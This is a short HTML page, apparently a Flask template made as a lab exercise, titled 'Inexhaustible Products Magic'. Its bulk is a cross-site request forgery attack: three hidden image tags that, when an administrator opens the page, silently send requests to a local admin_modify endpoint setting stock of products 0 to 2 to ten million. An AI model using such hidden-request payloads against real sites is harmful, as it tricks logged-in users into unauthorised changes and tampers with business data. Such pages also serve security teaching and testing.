<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Inexhaustible Products Magic</title>
</head>
<body>
    <h1>Boost your business</h1>
    <img style="display:none" src = "http://localhost:9090/admin_modify?productid=0&productnum=10000000" alt="">
    <img style="display:none" src = "http://localhost:9090/admin_modify?productid=1&productnum=10000000" alt="">
    <img style="display:none" src = "http://localhost:9090/admin_modify?productid=2&productnum=10000000" alt="">
    <img src = "{{url_for('static', filename='images/lots_of_glasses.jpg')}}">
</body>
</html>